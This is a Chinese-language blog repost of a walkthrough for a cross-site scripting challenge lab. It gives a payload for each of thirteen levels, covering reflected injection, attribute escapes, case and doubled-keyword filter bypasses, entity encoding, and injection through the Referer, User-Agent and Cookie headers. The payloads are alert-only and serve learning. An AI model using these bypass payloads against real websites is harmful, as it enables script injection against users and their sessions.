日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Xss挑战之旅writeup

發(fā)布時(shí)間:2023/12/14 编程问答 38 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Xss挑战之旅writeup 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

Level_1
輸入點(diǎn)在url中,反射型

payload: http://118.89.167.246:2503/xss-game/level1.php?name=<script>alert(/xss/)</script>

Level 2
搜索型,查看元素可以看到輸入在input標(biāo)簽內(nèi),需要閉合input標(biāo)簽

Payload: “><script>alert(‘xss’)</script><

Level 3
輸入點(diǎn)在input標(biāo)簽的value屬性里面,嘗試閉合屬性,基于事件彈窗 ,雙引號(hào)失敗,試試 單引號(hào)

Paload: ‘ onmouseover=alert(‘xss’)

Level 4
和上一題一樣,輸入點(diǎn)也是在value屬性里面,這次用雙引號(hào)閉合屬性

Payload: “ onmouseover=alert(‘xss’) “

Level 5
過濾情況:
On替換為o_n
Script替換為sc_ript
大小寫嘗試了也不行,只能用別的辦法了

Payload: “><a href=javascript:alert(‘xss’)>111</a><

Level 6.
過濾情況:
On替換為o_n
Script替換為sc_ript
Href替換為hr_ef
嘗試了一下用大小寫繞過

Payload: “><img Src=ss Onerror=alert(‘xss’)>“><Script>alert(‘xss’)</SCript>“><a HRef=javascript:alert(‘xss’)>hh</a>

Level 7
輸入一個(gè)”><script>alert(‘xss’)</script>試試,發(fā)現(xiàn)script標(biāo)簽被刪除了!

Href和on也被刪除了,嘗試雙寫繞過
Payload:

“><scrscriptipt>alert(‘xss’)</scriscriptpt> “ oonnmouseover=alert ‘1’ “><a hrhrefef=javasscriptcript:alert(‘xss’)>hh</a>

Level 8
基礎(chǔ)知識(shí):javascript:偽協(xié)議聲明了URL的主體是任意的javascript代碼,它由javascript的解釋器運(yùn)行

Javascript會(huì)被替換為javasc_rpt,考慮用Html實(shí)體編碼繞過,r編碼為&#x72;

Payload: javasc&#x72;ipt:alert(xss’)

Level 9
Javascript會(huì)被替換為javasc_rpt,考慮用Html實(shí)體編碼繞過,r編碼為&#x72;
用上一關(guān)的payload試試,提示鏈接不合法,必須要有http://關(guān)鍵字

Payload: javasc&#x72;ipt:%0dhttp://www.0aa.me%0dalert(1) 或 javascript:alert(1)//http://www.0aa.me %0a %0d都為url編碼的換行符

Level 10
Keyword注入點(diǎn),<、>都被過濾,幾乎不能突破。右鍵源代碼看到有個(gè)hidden的form表單,

Keyword參數(shù)后面輸入:

&t_link=” type=”text” 1&t_history=” type=”text” 2&t_sort =” type=”text” 3

查看注入點(diǎn),發(fā)現(xiàn)t_sort字段可以注入

Payload: &t_sort=" type="text"onmouseover=alert`1` "

Level 11
和上題一樣有個(gè)hidden的表單,不過此題的注入點(diǎn)在t_ref字段,值為http referer,抓包修改

referer頭修改為:” type=”text” onmouseover=alert `1`

Forward放行后彈窗

Level 12
這一關(guān)的注入點(diǎn)在user-agent

和上題一樣,抓包,改user-agent

Payload:” type=”text” onmouseover=alert `1` “

Level 13
類似的,修改cookie參數(shù)

總結(jié)

以上是生活随笔為你收集整理的Xss挑战之旅writeup的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。